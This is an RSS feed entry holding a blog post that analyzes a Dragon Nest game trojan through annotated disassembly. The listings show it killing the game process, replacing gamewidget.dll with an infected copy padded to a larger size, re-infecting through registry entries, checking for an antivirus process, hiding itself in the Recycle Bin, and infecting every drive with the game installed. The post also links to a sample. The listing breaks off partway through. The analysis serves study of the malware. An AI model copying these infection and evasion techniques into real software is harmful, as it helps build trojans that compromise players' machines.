<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>零度x&#039;s blog &#187; Analysis</title>
	<atom:link href="http://www.lingdux.com/tag/%e5%88%86%e6%9e%90/feed" rel="self" type="application/rss+xml" />
	<link>http://www.lingdux.com</link>
	<description>Take it slowly, it&#039;s OK, it&#039;s OK.</description>
	<lastBuildDate>Wed, 09 Mar 2011 14:16:17 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Analysis of a Dragon Nest Trojan</title>
		<link>http://www.lingdux.com/2010/223.html</link>
		<comments>http://www.lingdux.com/2010/223.html#comments</comments>
		<pubDate>Tue, 28 Sep 2010 06:36:10 +0000</pubDate>
		<dc:creator>零度x</dc:creator>
				<category><![CDATA[Virus Analysis]]></category>
		<category><![CDATA[Analysis]]></category>
		<category><![CDATA[Trojan]]></category>
		<category><![CDATA[Dragon Nest]]></category>

		<guid isPermaLink="false">http://www.lingdux.com/?p=223</guid>
		<description><![CDATA[Virus sample: http://www.52pojie.cn/thread-64398-1-1.html

Only the exe is analyzed here; the infected dll will be analyzed next time.

exe

<span class="readmore"><a href="http://www.lingdux.com/2010/223.html" title="Analysis of a Dragon Nest Trojan">Read the full article (26999 characters in total)</a></span>]]></description>
			<content:encoded><![CDATA[<p>Virus sample: <a href="http://www.52pojie.cn/thread-64398-1-1.html">http://www.52pojie.cn/thread-64398-1-1.html</a></p>
<p>Only the exe is analyzed here; the infected dll will be analyzed next time.</p>
<p>exe</p>
<p>Getting rid of the hourglass (busy) cursor at startup</p>
<pre class="brush: plain; title: ; notranslate">

004017C9  |.  53            push    ebx
004017CA  |.  55            push    ebp
004017CB  |.  56            push    esi
004017CC  |.  57            push    edi
004017CD  |.  FF15 AC104000 call    dword ptr [&lt;&amp;USER32.GetInputStat&gt;; [GetInputState
004017D3  |.  33DB          xor     ebx, ebx
004017D5  |.  53            push    ebx                              ; /lParam =&gt; 0
004017D6  |.  53            push    ebx                              ; |wParam =&gt; 0
004017D7  |.  53            push    ebx                              ; |Message =&gt; WM_NULL
004017D8  |.  FF15 64104000 call    dword ptr [&lt;&amp;KERNEL32.GetCurrent&gt;; |[GetCurrentThreadId
004017DE  |.  50            push    eax                              ; |ThreadId
004017DF  |.  FF15 B0104000 call    dword ptr [&lt;&amp;USER32.PostThreadMe&gt;; \PostThreadMessageA
004017E5  |.  53            push    ebx                              ; /MsgFilterMax =&gt; 0
004017E6  |.  53            push    ebx                              ; |MsgFilterMin =&gt; 0
004017E7  |.  8D4424 1C     lea     eax, dword ptr [esp+1C]          ; |
004017EB  |.  53            push    ebx                              ; |hWnd =&gt; NULL
004017EC  |.  50            push    eax                              ; |pMsg
004017ED  |.  FF15 B4104000 call    dword ptr [&lt;&amp;USER32.GetMessageA&gt;&gt;; \GetMessageA
</pre>
<p><span id="more-223"></span></p>
<p>Reading the appended data</p>
<pre class="brush: plain; title: ; notranslate">

004017F8  |.  68 1C284000   push    0040281C                         ; /Buffer = ctfmon.0040281C
004017FD  |.  56            push    esi                              ; |BufSize =&gt; 104 (260.)
004017FE  |.  FF15 60104000 call    dword ptr [&lt;&amp;KERNEL32.GetLogical&gt;; \GetLogicalDriveStringsA
00401804  |.  6A 40         push    40                               ;  get the drive list
00401806  |.  33C0          xor     eax, eax
00401808  |.  59            pop     ecx
00401809  |.  8D7C24 31     lea     edi, dword ptr [esp+31]
0040180D  |.  885C24 30     mov     byte ptr [esp+30], bl
00401811  |.  56            push    esi                              ; /BufSize =&gt; 104 (260.)
00401812  |.  F3:AB         rep     stos dword ptr es:[edi]          ; |
00401814  |.  66:AB         stos    word ptr es:[edi]                ; |
00401816  |.  AA            stos    byte ptr es:[edi]                ; |
00401817  |.  8D4424 34     lea     eax, dword ptr [esp+34]          ; |
0040181B  |.  895C24 14     mov     dword ptr [esp+14], ebx          ; |
0040181F  |.  50            push    eax                              ; |PathBuffer
00401820  |.  53            push    ebx                              ; |hModule =&gt; NULL
00401821  |.  FF15 48104000 call    dword ptr [&lt;&amp;KERNEL32.GetModuleF&gt;; \GetModuleFileNameA
00401827  |.  8B3D 5C104000 mov     edi, dword ptr [&lt;&amp;KERNEL32.SetFi&gt;;  get own path
0040182D  |.  8B2D 58104000 mov     ebp, dword ptr [&lt;&amp;KERNEL32.ReadF&gt;;  kernel32.ReadFile
00401833  |&gt;  53            /push    ebx                             ; /hTemplateFile
00401834  |.  53            |push    ebx                             ; |Attributes
00401835  |.  6A 03         |push    3                               ; |Mode = OPEN_EXISTING
00401837  |.  53            |push    ebx                             ; |pSecurity
00401838  |.  53            |push    ebx                             ; |ShareMode
00401839  |.  8D4424 44     |lea     eax, dword ptr [esp+44]         ; |
0040183D  |.  68 00000080   |push    80000000                        ; |Access = GENERIC_READ
00401842  |.  50            |push    eax                             ; |FileName
00401843  |.  FF15 28104000 |call    dword ptr [&lt;&amp;KERNEL32.CreateFil&gt;; \CreateFileA
00401849  |.  8BF0          |mov     esi, eax                        ;  open itself
0040184B  |.  3BF3          |cmp     esi, ebx
0040184D  |.  74 3B         |je      short 0040188A
0040184F  |.  6A 02         |push    2
00401851  |.  53            |push    ebx
00401852  |.  68 3CFEFFFF   |push    -1C4
00401857  |.  56            |push    esi
00401858  |.  FFD7          |call    edi                             ;  kernel32.SetFilePointer
0040185A  |.  8D4424 10     |lea     eax, dword ptr [esp+10]         ;  set file pointer
0040185E  |.  53            |push    ebx
0040185F  |.  50            |push    eax
00401860  |.  68 C4010000   |push    1C4
00401865  |.  68 201A4000   |push    00401A20
0040186A  |.  56            |push    esi
0040186B  |.  FFD5          |call    ebp                             ;  kernel32.ReadFile
0040186D  |.  A1 E01B4000   |mov     eax, dword ptr [401BE0]         ;  read appended data
00401872  |.  3BC3          |cmp     eax, ebx
00401874  |.  77 23         |ja      short 00401899
00401876  |.  68 E8030000   |push    3E8                             ; /Timeout = 1000. ms
0040187B  |.  FF15 44104000 |call    dword ptr [&lt;&amp;KERNEL32.Sleep&gt;]   ; \Sleep
00401881  |.  56            |push    esi                             ; /hObject
00401882  |.  FF15 20104000 |call    dword ptr [&lt;&amp;KERNEL32.CloseHand&gt;; \CloseHandle
00401888  |.^ EB A9         \jmp     short 00401833                  ; if the read fails, go back and retry
0040188A  |&gt;  5F            pop     edi
0040188B  |.  5E            pop     esi
0040188C  |.  5D            pop     ebp
0040188D  |.  33C0          xor     eax, eax
0040188F  |.  5B            pop     ebx
00401890  |.  81C4 2C030000 add     esp, 32C
00401896  |.  C2 1000       retn    10
00401899  |&gt; \50            push    eax
0040189A  |.  E8 69010000   call    &lt;jmp.&amp;MSVCRT.operator new&gt;
0040189F  |.  A3 20294000   mov     dword ptr [402920], eax
004018A4  |.  B8 3CFEFFFF   mov     eax, -1C4
004018A9  |.  2B05 E01B4000 sub     eax, dword ptr [401BE0]
004018AF  |.  59            pop     ecx
004018B0  |.  6A 02         push    2
004018B2  |.  53            push    ebx
004018B3  |.  50            push    eax
004018B4  |.  56            push    esi
004018B5  |.  FFD7          call    edi                              ;  kernel32.SetFilePointer
004018B7  |.  8D4424 10     lea     eax, dword ptr [esp+10]          ;  set file pointer
004018BB  |.  53            push    ebx
004018BC  |.  50            push    eax
004018BD  |.  FF35 E01B4000 push    dword ptr [401BE0]
004018C3  |.  FF35 20294000 push    dword ptr [402920]
004018C9  |.  56            push    esi
004018CA  |.  FFD5          call    ebp                              ;  kernel32.ReadFile
004018CC  |.  56            push    esi                              ; /read appended data
004018CD  |.  FF15 20104000 call    dword ptr [&lt;&amp;KERNEL32.CloseHandl&gt;; \CloseHandle
004018D3  |.  E8 4CF9FFFF   call    00401224                         ;  release handle
</pre>
<p>Look for the Dragon Nest process and terminate it if found</p>
<pre class="brush: plain; title: ; notranslate">

004011C0  /$  55            push    ebp                              ;  kernel32.ReadFile
004011C1  |.  8BEC          mov     ebp, esp
004011C3  |.  81EC 28010000 sub     esp, 128
004011C9  |.  56            push    esi
004011CA  |.  6A 00         push    0                                ; /ProcessID = 0
004011CC  |.  6A 02         push    2                                ; |Flags = TH32CS_SNAPPROCESS
004011CE  |.  E8 23080000   call    &lt;jmp.&amp;KERNEL32.CreateToolhelp32S&gt;; \CreateToolhelp32Snapshot
004011D3  |.  8BF0          mov     esi, eax
004011D5  |.  8D85 D8FEFFFF lea     eax, dword ptr [ebp-128]
004011DB  |.  50            push    eax                              ; /lppe
004011DC  |.  56            push    esi                              ; |hSnapshot
004011DD  |.  C785 D8FEFFFF&gt;mov     dword ptr [ebp-128], 128         ; |
004011E7  |.  E8 04080000   call    &lt;jmp.&amp;KERNEL32.Process32First&gt;   ; \Process32First
004011EC  |.  85C0          test    eax, eax
004011EE  |.  74 2F         je      short 0040121F
004011F0  |&gt;  8D85 D8FEFFFF /lea     eax, dword ptr [ebp-128]
004011F6  |.  50            |push    eax                             ; /lppe
004011F7  |.  56            |push    esi                             ; |hSnapshot
004011F8  |.  E8 ED070000   |call    &lt;jmp.&amp;KERNEL32.Process32Next&gt;   ; \Process32Next
004011FD  |.  85C0          |test    eax, eax
004011FF  |.  74 1E         |je      short 0040121F
00401201  |.  8D85 FCFEFFFF |lea     eax, dword ptr [ebp-104]
00401207  |.  50            |push    eax                             ; /s2
00401208  |.  FF75 08       |push    dword ptr [ebp+8]               ; |s1
0040120B  |.  FF15 9C104000 |call    dword ptr [&lt;&amp;MSVCRT._stricmp&gt;]  ; \_stricmp
00401211  |.  59            |pop     ecx        ; look for the Dragon Nest process
00401212  |.  85C0          |test    eax, eax
00401214  |.  59            |pop     ecx
00401215  |.^ 75 D9         \jnz     short 004011F0
00401217  |.  8B85 E0FEFFFF mov     eax, dword ptr [ebp-120]
0040121D  |.  EB 02         jmp     short 00401221
0040121F  |&gt;  33C0          xor     eax, eax
00401221  |&gt;  5E            pop     esi
00401222  |.  C9            leave
00401223  \.  C3            retn

0040122F  |.  50            push    eax                              ; /ProcessId
00401230  |.  6A 00         push    0                                ; |Inheritable = FALSE
00401232  |.  6A 01         push    1                                ; |Access = TERMINATE
00401234  |.  FF15 10104000 call    dword ptr [&lt;&amp;KERNEL32.OpenProces&gt;; \OpenProcess
0040123A  |.  6A 00         push    0                                ; /ExitCode = 0
0040123C  |.  50            push    eax                              ; |hProcess
0040123D  |.  FF15 3C104000 call    dword ptr [&lt;&amp;KERNEL32.TerminateP&gt;; \TerminateProcess
00401243  \.  C3            retn         ; terminate the process if it exists
</pre>
<p>Copies the original gamewidget.dll in the game directory to DragonNestRes.dll, then infects gamewidget.dll and makes a copy of it as midimap.dll</p>
<pre class="brush: plain; title: ; notranslate">

004015C2  |.  50            push    eax                              ; /pHandle
004015C3  |.  33DB          xor     ebx, ebx                         ; |
004015C5  |.  68 19000200   push    20019                            ; |Access = KEY_READ
004015CA  |.  53            push    ebx                              ; |Reserved =&gt; 0
004015CB  |.  68 64114000   push    00401164                         ; |Subkey = &quot;SOFTWARE\snda\dn&quot;
004015D0  |.  68 02000080   push    80000002                         ; |hKey = HKEY_LOCAL_MACHINE
004015D5  |.  FF15 08104000 call    dword ptr [&lt;&amp;ADVAPI32.RegOpenKey&gt;; \RegOpenKeyExA
004015DB  |.  85C0          test    eax, eax                         ;  read HKEY_LOCAL_MACHINE\SOFTWARE\snda\dn
004015DD  |. /0F85 8C000000 jnz     0040166F        ; return if it cannot be read
004015E3  |. |6A 40         push    40
004015E5  |. |8DBD F1FEFFFF lea     edi, dword ptr [ebp-10F]
004015EB  |. |59            pop     ecx
004015EC  |. |889D F0FEFFFF mov     byte ptr [ebp-110], bl
004015F2  |. |F3:AB         rep     stos dword ptr es:[edi]
004015F4  |. |66:AB         stos    word ptr es:[edi]
004015F6  |. |AA            stos    byte ptr es:[edi]
004015F7  |. |8D45 F8       lea     eax, dword ptr [ebp-8]
004015FA  |. |C745 F4 01000&gt;mov     dword ptr [ebp-C], 1
00401601  |. |50            push    eax                              ; /pBufSize
00401602  |. |8D85 F0FEFFFF lea     eax, dword ptr [ebp-110]         ; |
00401608  |. |50            push    eax                              ; |Buffer
00401609  |. |8D45 F4       lea     eax, dword ptr [ebp-C]           ; |
0040160C  |. |50            push    eax                              ; |pValueType
0040160D  |. |53            push    ebx                              ; |Reserved =&gt; NULL
0040160E  |. |68 58114000   push    00401158                         ; |ValueName = &quot;MainProg&quot;
00401613  |. |C745 F8 04010&gt;mov     dword ptr [ebp-8], 104           ; |
0040161A  |. |FF75 FC       push    dword ptr [ebp-4]                ; |hKey
0040161D  |. |FF15 04104000 call    dword ptr [&lt;&amp;ADVAPI32.RegQueryVa&gt;; \RegQueryValueExA
00401623  |. |85C0          test    eax, eax                         ;  read the path
004013B3  |.  50            push    eax                              ; /FileName
004013B4  |.  FF15 30104000 call    dword ptr [&lt;&amp;KERNEL32.GetFileAtt&gt;; \GetFileAttributesA
004013BA  |.  83F8 FF       cmp     eax, -1                          ;  get file attributes to check whether DragonNestRes.dll exists
004013BD  |.  75 15         jnz     short 004013D4
004013BF  |.  8D85 F4FDFFFF lea     eax, dword ptr [ebp-20C]
004013C5  |.  53            push    ebx                              ; /FailIfExists
004013C6  |.  50            push    eax                              ; |NewFileName
004013C7  |.  8D85 F8FEFFFF lea     eax, dword ptr [ebp-108]         ; |
004013CD  |.  50            push    eax                              ; |ExistingFileName
004013CE  |.  FF15 2C104000 call    dword ptr [&lt;&amp;KERNEL32.CopyFileA&gt;&gt;; \CopyFileA
004013D4  |&gt;  8D85 F8FEFFFF lea     eax, dword ptr [ebp-108]         ;  if it does not exist, copy the original gamewidget.dll in the game directory to DragonNestRes.dll

00401299  /$  55            push    ebp
0040129A  |.  8BEC          mov     ebp, esp
0040129C  |.  81EC 08020000 sub     esp, 208
004012A2  |.  56            push    esi
004012A3  |.  8B75 08       mov     esi, dword ptr [ebp+8]
004012A6  |.  56            push    esi                              ; /FileName
004012A7  |.  FF15 1C104000 call    dword ptr [&lt;&amp;KERNEL32.DeleteFile&gt;; \DeleteFileA
004012AD  |.  6A 00         push    0                                ; /delete gamewidget.dll
004012AF  |.  56            push    esi                              ; |path
004012B0  |.  FF15 A0104000 call    dword ptr [&lt;&amp;MSVCRT._access&gt;]    ; \_access
004012B6  |.  59            pop     ecx                              ;  check whether the deletion succeeded
00401401  |.  53            push    ebx                              ; /hTemplateFile
00401402  |.  53            push    ebx                              ; |Attributes
00401403  |.  6A 01         push    1                                ; |Mode = CREATE_NEW
00401405  |.  53            push    ebx                              ; |pSecurity
00401406  |.  53            push    ebx                              ; |ShareMode
00401407  |.  68 00000040   push    40000000                         ; |Access = GENERIC_WRITE
0040140C  |.  50            push    eax                              ; |FileName
0040140D  |.  FF15 28104000 call    dword ptr [&lt;&amp;KERNEL32.CreateFile&gt;; \CreateFileA
00401413  |.  8BF8          mov     edi, eax                         ;  create the new gamewidget.dll
00401415  |.  3BFB          cmp     edi, ebx
00401417  |.  75 07         jnz     short 00401420
00401419  |.  33C0          xor     eax, eax
0040141B  |.  E9 A5000000   jmp     004014C5
00401420  |&gt;  8D45 FC       lea     eax, dword ptr [ebp-4]
00401423  |.  53            push    ebx                              ; /pOverlapped
00401424  |.  50            push    eax                              ; |pBytesWritten
00401425  |.  8B35 24104000 mov     esi, dword ptr [&lt;&amp;KERNEL32.Write&gt;; |kernel32.WriteFile
0040142B  |.  FF35 E01B4000 push    dword ptr [401BE0]               ; |nBytesToWrite = 2A00 (10752.)
00401431  |.  FF35 20294000 push    dword ptr [402920]               ; |Buffer = 003D4380
00401437  |.  57            push    edi                              ; |hFile
00401438  |.  FFD6          call    esi                              ; \WriteFile
0040143A  |.  C745 0C D0070&gt;mov     dword ptr [ebp+C], 7D0           ;  write the DLL
00401441  |&gt; /8D45 FC       /lea     eax, dword ptr [ebp-4]
00401444  |. |53            |push    ebx
00401445  |. |50            |push    eax
00401446  |. |FF35 E01B4000 |push    dword ptr [401BE0]
0040144C  |. |FF35 20294000 |push    dword ptr [402920]
00401452  |. |57            |push    edi
00401453  |. |FFD6          |call    esi
00401455  |. |FF4D 0C       |dec     dword ptr [ebp+C]
00401458  |.^\75 E7         \jnz     short 00401441                  ;  write it another 2000 times to inflate the file size
0040145A  |.  8D45 FC       lea     eax, dword ptr [ebp-4]
0040145D  |.  53            push    ebx
0040145E  |.  50            push    eax
0040145F  |.  68 C4010000   push    1C4
00401464  |.  68 201A4000   push    00401A20
00401469  |.  57            push    edi
0040146A  |.  FFD6          call    esi                              ;  kernel32.WriteFile
0040146C  |.  57            push    edi                              ; /write appended data
0040146D  |.  FF15 20104000 call    dword ptr [&lt;&amp;KERNEL32.CloseHandl&gt;; \CloseHandle
00401473  |.  6A 40         push    40                               ;  release handle
004014AD  |.  8D85 F0FCFFFF lea     eax, dword ptr [ebp-310]
004014B3  |.  53            push    ebx                              ; /FailIfExists
004014B4  |.  50            push    eax                              ; |NewFileName
004014B5  |.  8D85 F8FEFFFF lea     eax, dword ptr [ebp-108]         ; |
004014BB  |.  50            push    eax                              ; |ExistingFileName = &quot;C:\Program Files\?,A2,&quot;&quot;,B4,&quot;笸鏫龙之谷\gamewidget.dll&quot;
004014BC  |.  FF15 2C104000 call    dword ptr [&lt;&amp;KERNEL32.CopyFileA&gt;&gt;; \CopyFileA
004014C2  |.  6A 01         push    1                                ;  copy the already-replaced gamewidget.dll to midimap.dll
</pre>
<p>Re-infection</p>
<pre class="brush: plain; title: ; notranslate">

00401684  |.  50            push    eax                              ; /pHandle
00401685  |.  33DB          xor     ebx, ebx                         ; |
00401687  |.  68 19000200   push    20019                            ; |Access = KEY_READ
0040168C  |.  53            push    ebx                              ; |Reserved =&gt; 0
0040168D  |.  68 84114000   push    00401184                         ; |Subkey = &quot;Software\Microsoft\Windows\ShellNoRoam\MUICache&quot;
00401692  |.  68 01000080   push    80000001                         ; |hKey = HKEY_CURRENT_USER
00401697  |.  FF15 08104000 call    dword ptr [&lt;&amp;ADVAPI32.RegOpenKey&gt;; \RegOpenKeyExA
0040169D  |.  85C0          test    eax, eax                         ;  open HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache
0040169F  |. /0F85 17010000 jnz     004017BC
004016A5  |. |895D FC       mov     dword ptr [ebp-4], ebx
004016A8  |. |BE 04010000   mov     esi, 104
004016AD  |&gt; |6A 40         /push    40
004016AF  |. |33C0          |xor     eax, eax
004016B1  |. |59            |pop     ecx
004016B2  |. |8DBD E5FEFFFF |lea     edi, dword ptr [ebp-11B]
004016B8  |. |889D E4FEFFFF |mov     byte ptr [ebp-11C], bl
004016BE  |. |6A 40         |push    40
004016C0  |. |F3:AB         |rep     stos dword ptr es:[edi]
004016C2  |. |66:AB         |stos    word ptr es:[edi]
004016C4  |. |AA            |stos    byte ptr es:[edi]
004016C5  |. |59            |pop     ecx
004016C6  |. |33C0          |xor     eax, eax
004016C8  |. |8DBD D9FBFFFF |lea     edi, dword ptr [ebp-427]
004016CE  |. |889D D8FBFFFF |mov     byte ptr [ebp-428], bl
004016D4  |. |F3:AB         |rep     stos dword ptr es:[edi]
004016D6  |. |8D4D EC       |lea     ecx, dword ptr [ebp-14]
004016D9  |. |8975 F0       |mov     dword ptr [ebp-10], esi
004016DC  |. |51            |push    ecx                             ; /pBufSize
004016DD  |. |8D8D D8FBFFFF |lea     ecx, dword ptr [ebp-428]        ; |
004016E3  |. |51            |push    ecx                             ; |Buffer
004016E4  |. |8D4D F8       |lea     ecx, dword ptr [ebp-8]          ; |
004016E7  |. |66:AB         |stos    word ptr es:[edi]               ; |
004016E9  |. |51            |push    ecx                             ; |pValueType
004016EA  |. |8D4D F0       |lea     ecx, dword ptr [ebp-10]         ; |
004016ED  |. |53            |push    ebx                             ; |Reserved
004016EE  |. |51            |push    ecx                             ; |pValueCount
004016EF  |. |AA            |stos    byte ptr es:[edi]               ; |
004016F0  |. |8B45 FC       |mov     eax, dword ptr [ebp-4]          ; |
004016F3  |. |FF45 FC       |inc     dword ptr [ebp-4]               ; |
004016F6  |. |8D8D E4FEFFFF |lea     ecx, dword ptr [ebp-11C]        ; |
004016FC  |. |C745 F8 01000&gt;|mov     dword ptr [ebp-8], 1            ; |
00401703  |. |51            |push    ecx                             ; |Value
00401704  |. |50            |push    eax                             ; |Index
00401705  |. |FF75 F4       |push    dword ptr [ebp-C]               ; |hKey
00401708  |. |8975 EC       |mov     dword ptr [ebp-14], esi         ; |
0040170B  |. |FF15 00104000 |call    dword ptr [&lt;&amp;ADVAPI32.RegEnumVa&gt;; \RegEnumValueA
00401711  |. |85C0          |test    eax, eax                        ;  read the value
00401713  |. |0F85 A3000000 |jnz     004017BC
00401719  |. |6A 40         |push    40
0040171B  |. |8DBD DDFCFFFF |lea     edi, dword ptr [ebp-323]
00401721  |. |59            |pop     ecx
00401722  |. |889D DCFCFFFF |mov     byte ptr [ebp-324], bl
00401728  |. |F3:AB         |rep     stos dword ptr es:[edi]
0040172A  |. |66:AB         |stos    word ptr es:[edi]
0040172C  |. |AA            |stos    byte ptr es:[edi]
0040172D  |. |8D45 E8       |lea     eax, dword ptr [ebp-18]
00401730  |. |8975 E8       |mov     dword ptr [ebp-18], esi
00401733  |. |50            |push    eax                             ; /pBufSize
00401734  |. |8D85 DCFCFFFF |lea     eax, dword ptr [ebp-324]        ; |
0040173A  |. |50            |push    eax                             ; |Buffer
0040173B  |. |8D45 F8       |lea     eax, dword ptr [ebp-8]          ; |
0040173E  |. |50            |push    eax                             ; |pValueType
0040173F  |. |8D85 E4FEFFFF |lea     eax, dword ptr [ebp-11C]        ; |
00401745  |. |53            |push    ebx                             ; |Reserved
00401746  |. |50            |push    eax                             ; |ValueName
00401747  |. |FF75 F4       |push    dword ptr [ebp-C]               ; |hKey
0040174A  |. |FF15 04104000 |call    dword ptr [&lt;&amp;ADVAPI32.RegQueryV&gt;; \RegQueryValueExA
00401750  |. |85C0          |test    eax, eax                        ;  read LangID
00401752  |.^|0F85 55FFFFFF |jnz     004016AD
00401758  |. |8D85 DCFCFFFF |lea     eax, dword ptr [ebp-324]
0040175E  |. |68 78114000   |push    00401178                        ; /s2 = &quot;dragonnest&quot;
00401763  |. |50            |push    eax                             ; |s1 = &quot;?,AC,&quot;?,B6,&quot;终&quot;,B6,&quot;?
00401764  |. |FF15 8C104000 |call    dword ptr [&lt;&amp;MSVCRT.strstr&gt;]    ; \strstr
0040176A  |. |59            |pop     ecx                             ;  look for an entry whose value contains dragonnest
0040176B  |. |85C0          |test    eax, eax
0040176D  |. |59            |pop     ecx
0040176E  |.^|0F84 39FFFFFF \je      004016AD

...infect once again...
</pre>
<p>Looks for the Rising (瑞星) antivirus process; if it is not found, moves itself to the Recycle Bin under a random file name</p>
<pre class="brush: plain; title: ; notranslate">

004018E2  |.  BD B4114000   mov     ebp, 004011B4                    ;  ASCII &quot;RavMonD.exe&quot;
004018E7  |.  55            push    ebp
004018E8  |.  E8 D3F8FFFF   call    004011C0                         ;  look for RavMonD.exe; if not found, move itself to the Recycle Bin under a random file name

00401511  |.  68 04010000   push    104                              ; /BufSize = 104 (260.)
00401516  |.  50            push    eax                              ; |PathBuffer
00401517  |.  6A 00         push    0                                ; |hModule = NULL
00401519  |.  FF15 48104000 call    dword ptr [&lt;&amp;KERNEL32.GetModuleF&gt;; \GetModuleFileNameA
0040151F  |.  8B35 54104000 mov     esi, dword ptr [&lt;&amp;KERNEL32.GetTi&gt;;  get own path
00401525  |.  FFD6          call    esi                              ; [GetTickCount
00401527  |.  50            push    eax                              ; /get tick count since boot
00401528  |.  8B3D A8104000 mov     edi, dword ptr [&lt;&amp;USER32.wsprint&gt;; |USER32.wsprintfA
0040152E  |.  0FBE85 FCFEFF&gt;movsx   eax, byte ptr [ebp-104]          ; |
00401535  |.  50            push    eax                              ; |&lt;%c&gt;
00401536  |.  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]         ; |
0040153C  |.  68 44114000   push    00401144                         ; |Format = &quot;%c:\RECYCLER\%d.tmp&quot;
00401541  |.  50            push    eax                              ; |s
00401542  |.  FFD7          call    edi                              ; \wsprintfA
00401544  |.  8B1D 1C104000 mov     ebx, dword ptr [&lt;&amp;KERNEL32.Delet&gt;;  build the path C:\RECYCLER\4143625.tmp
0040154A  |.  83C4 10       add     esp, 10
0040154D  |.  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]
00401553  |.  50            push    eax                              ; /FileName
00401554  |.  FFD3          call    ebx                              ; \DeleteFileA
00401556  |.  85C0          test    eax, eax                         ;  delete the file (if it already exists)
00401558  |.  75 30         jnz     short 0040158A
0040155A  |.  FF15 50104000 call    dword ptr [&lt;&amp;KERNEL32.GetLastErr&gt;; [GetLastError
00401560  |.  83F8 03       cmp     eax, 3
00401563  |.  75 25         jnz     short 0040158A
00401565  |.  FFD6          call    esi
00401567  |.  50            push    eax                              ;  get tick count since boot
00401568  |.  0FBE85 FCFEFF&gt;movsx   eax, byte ptr [ebp-104]
0040156F  |.  50            push    eax
00401570  |.  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]
00401576  |.  68 30114000   push    00401130                         ;  ASCII &quot;%c:\Recycled\%d.tmp&quot;
0040157B  |.  50            push    eax
0040157C  |.  FFD7          call    edi                              ;  wsprintfA
0040157E  |.  83C4 10       add     esp, 10                          ;  build C:\Recycled\4273328.tmp
00401581  |.  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]
00401587  |.  50            push    eax
00401588  |.  FFD3          call    ebx
0040158A  |&gt;  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]         ;  delete the file (if it already exists)
00401590  |.  50            push    eax                              ; /NewName
00401591  |.  8D85 FCFEFFFF lea     eax, dword ptr [ebp-104]         ; |
00401597  |.  50            push    eax                              ; |ExistingName
00401598  |.  FF15 4C104000 call    dword ptr [&lt;&amp;KERNEL32.MoveFileA&gt;&gt;; \MoveFileA
0040159E  |.  6A 04         push    4                                ; /move itself to C:\Recycled\4273328.tmp
004015A0  |.  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]         ; |
004015A6  |.  6A 00         push    0                                ; |NewName = NULL
004015A8  |.  50            push    eax                              ; |ExistingName
004015A9  |.  FF15 14104000 call    dword ptr [&lt;&amp;KERNEL32.MoveFileEx&gt;; \MoveFileExA
</pre>
<p>Infects every drive on which Dragon Nest is installed</p>
<p>[sourcode]</p>
<p>004018F7  |&gt;  6A 40         /push    40<br />
004018F9  |. |33C0          |xor     eax, eax<br />
004018FB  |. |59            |pop     ecx<br />
004018FC  |. |8DBC24 350100&gt;|lea     edi, dword ptr [esp+135]<br />
00401903  |. |889C24 340100&gt;|mov     byte ptr [esp+134], bl<br />
0040190A  |. |BE 1C284000   |mov     esi, 0040281C                   ;  ASCII "A:\"<br />
0040190F  |. |F3:AB         |rep     stos dword ptr es:[edi]<br />
00401911  |. |66:AB         |stos    word ptr es:[edi]<br />
00401913  |. |AA            |stos    byte ptr es:[edi]<br />
00401914  |. |33FF          |xor     edi, edi<br />
00401916  |. |381D 1C284000 |cmp     byte ptr [40281C], bl<br />
0040191C  |. |0F84 84000000 |je      004019A6<br />
00401922  |&gt; |56            |/push    esi                            ; /RootPathName<br />
00401923  |. |FF15 38104000 ||call    dword ptr [&lt;&amp;KERNEL32.GetDrive&gt;; \GetDriveTypeA<br />
00401929  |. |83F8 03       ||cmp     eax, 3                         ;  获取磁盘类型<br />
0040192C  |. |75 63         ||jnz     short 00401991                 ;  判断是否为固定磁盘<br />
0040192E  |. |8D8424 340100&gt;||lea     eax, dword ptr [esp+134]       ;  是则执行<br />
00401935  |. |50            ||push    eax<br />
00401936  |. |68 C8104000   ||push    004010C8                       ;  ASCII "dnlauncher.exe"<br />
0040193B  |. |56            ||push    esi<br />
0040193C  |. |FF15 BC104000 ||call    dword ptr [&lt;&amp;dbghelp.SearchTre&gt;;  dbghelp.SearchTreeForFile<br />
00401942  |. |85C0          ||test    eax, eax                       ;  查找是否存在dnlauncher.exe<br />
00401944  |. |74 4B         ||je      short 00401991<br />
00401946  |. |6A 40         ||push    40<br />
00401948  |. |33C0          ||xor     eax, eax<br />
0040194A  |. |59            ||pop     ecx<br />
0040194B  |. |8DBC24 390200&gt;||lea     edi, dword ptr [esp+239]<br />
00401952  |. |889C24 380200&gt;||mov     byte ptr [esp+238], bl<br />
00401959  |. |53            ||push    ebx<br />
0040195A  |. |F3:AB         ||rep     stos dword ptr es:[edi]<br />
0040195C  |. |66:AB         ||stos    word ptr es:[edi]<br />
0040195E  |. |AA            ||stos    byte ptr es:[edi]<br />
0040195F  |. |8D8424 3C0200&gt;||lea     eax, dword ptr [esp+23C]<br />
00401966  |. |50            ||push    eax<br />
00401967  |. |8D8424 3C0100&gt;||lea     eax, dword ptr [esp+13C]<br />
0040196E  |. |50            ||push    eax<br />
0040196F  |. |E8 D0F8FFFF   ||call    00401244                       ;  取dnlauncher.exe的路径<br />
00401974  |. |E8 ABF8FFFF   ||call    00401224                       ;  结束进程<br />
00401979  |. |8D8424 440200&gt;||lea     eax, dword ptr [esp+244]<br />
00401980  |. |68 E8104000   ||push    004010E8                       ;  ASCII "gamewidget.dll"<br />
00401985  |. |50            ||push    eax<br />
00401986  |. |E8 BAF9FFFF   ||call    00401345                       ;  再次感染<br />
0040198B  |. |83C4 14       ||add     esp, 14<br />
0040198E  |. |6A 01         ||push    1<br />
